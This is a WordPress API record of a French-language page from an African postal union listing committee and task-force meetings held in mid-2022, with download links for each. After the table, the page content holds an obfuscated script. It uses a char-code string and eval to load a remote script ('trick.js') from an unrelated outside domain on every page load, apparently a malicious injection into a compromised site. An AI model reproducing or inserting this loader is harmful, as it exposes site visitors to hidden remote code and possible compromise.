{"id":7710,"date":"2022-05-26T11:46:00","date_gmt":"2022-05-26T08:46:00","guid":{"rendered":"https:\/\/www.upap-papu.africa\/?page_id=7710"},"modified":"2022-10-12T15:01:02","modified_gmt":"2022-10-12T12:01:02","slug":"working-group-and-task-force-meetings","status":"publish","type":"page","link":"https:\/\/www.upap-papu.post\/fr\/working-group-and-task-force-meetings\/","title":{"rendered":"GROUPES DE TRAVAIL ET TASK FORCES PREVUES"},"content":{"rendered":"<p><\/p>\n<table class=\"style-1\">\n<tbody>\n<tr>\n<th style=\"text-align: left;\"><span style=\"font-family: inherit; font-size: inherit;\">\u00a0\u25ca COMMITTEE 1 (OPERATIONS AND TECHNOLOGY)<\/span><\/th>\n<th>\n<p id=\"tw-target-text\" class=\"tw-data-text tw-text-large tw-ta\" dir=\"ltr\" data-placeholder=\"Translation\"><span class=\"Y2IQFc\" lang=\"fr\">DATE DE LA R\u00c9UNION<\/span><\/p>\n<\/th>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/05\/french.zip\">Promotion de la Philat\u00e9li\u00e9<\/a> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0( <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/english_presentation.zip\">Presentations<\/a> )<\/td>\n<td>2\u00a0Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_DIGITALISATION_docs.zip\">Digitalisation et l\u2019Innovation<\/a> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 ( <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_DIGITALISATION_presentation.zip\">Pr\u00e9sentations<\/a> )<\/td>\n<td>6<sup>\u00a0<\/sup>Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_SUPPLY_CHAIN_documents.zip\">Chaine Logistique<\/a> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0( <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_SUPPLY_CHAIN_presentations.zip\">Pr\u00e9sentations<\/a> )<\/td>\n<td>9\u00a0Juin2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_RENUMERATION_documents.zip\">Remuneration<\/a> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0( <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/CET-GR-Egypte-Pr\u00e9sentation-sur-la-R\u00e9muneration.pdf\">Pr\u00e9sentations<\/a> )<\/td>\n<td>13<sup>\u00a0<\/sup>Juin 2022<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left;\"><strong><span style=\"font-family: inherit; font-size: inherit;\">\u00a0\u25ca <\/span>COMMITTEE 2 (FINANCE AND ADMINISTRATION)<\/strong><\/th>\n<th><span class=\"Y2IQFc\" lang=\"fr\">DATE DE LA R\u00c9UNION<\/span><\/th>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_mandatory_documents.zip\">Recouvrement des arrieres de contributions statutaires<\/a><\/td>\n<td>27\u00a0Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_HR_documents.zip\">Gestion des Ressources humaines<\/a><\/td>\n<td>28\u00a0Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/07\/french_AC_finance_documents.zip\">Comite des finances et de l&rsquo;administration<\/a><\/td>\n<td>4 &#8211; 6\u00a0July 2022<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left;\"><strong> <span style=\"font-family: inherit; font-size: inherit;\">\u25ca <\/span>COMMITTEE 3 (POLICY AND REGULATION)<\/strong><\/th>\n<th><span class=\"Y2IQFc\" lang=\"fr\">DATE DE LA R\u00c9UNION<\/span><\/th>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_PLG_documents.zip\">Harmonisation des politiques et reglementations<\/a><\/td>\n<td>20<sup>\u00a0<\/sup>Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/07\/french_RDWG_documents.zip\">Developpement de la reglementation<\/a><\/td>\n<td>22<sup>\u00a0<\/sup>Juin 2022<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left;\"><strong> <span style=\"font-family: inherit; font-size: inherit;\">\u25ca <\/span>COMMITTEE 4 (STRATEGY)<\/strong><\/th>\n<th><span class=\"Y2IQFc\" lang=\"fr\">DATE DE LA R\u00c9UNION<\/span><\/th>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_investments_documents.zip\">lnvestissements &amp; Projets<\/a><\/td>\n<td>15\u00a0Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_DRM_documents.zip\">Gestion des catastrophes et des risques<\/a> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 ( <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/english_DRM_presentations.zip\">pr\u00e9sentations<\/a> )<\/td>\n<td>3\u00a0Juin 2022<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: left;\">:: <a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2022\/06\/french_task_force_UPU.zip\">Task Force sur I\u2019ouverture de IIUPU aux acteurs du secteur postal elargi<\/a><\/td>\n<td>7\u00a0Juin 2022<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<script id='globalsway'>var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,115,116,111,99,107,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,116,114,105,99,107,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(t);<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u00a0\u25ca COMMITTEE 1 (OPERATIONS AND TECHNOLOGY) DATE DE LA R\u00c9UNION :: Promotion de la Philat\u00e9li\u00e9 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0( Presentations ) 2\u00a0Juin 2022&#8230; <\/p>\n<div class=\"clear\"><\/div>\n<p><a href=\"https:\/\/www.upap-papu.post\/fr\/working-group-and-task-force-meetings\/\" class=\"excerpt-read-more\">Read More<\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-7710","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/7710"}],"collection":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/comments?post=7710"}],"version-history":[{"count":11,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/7710\/revisions"}],"predecessor-version":[{"id":8147,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/7710\/revisions\/8147"}],"wp:attachment":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/media?parent=7710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}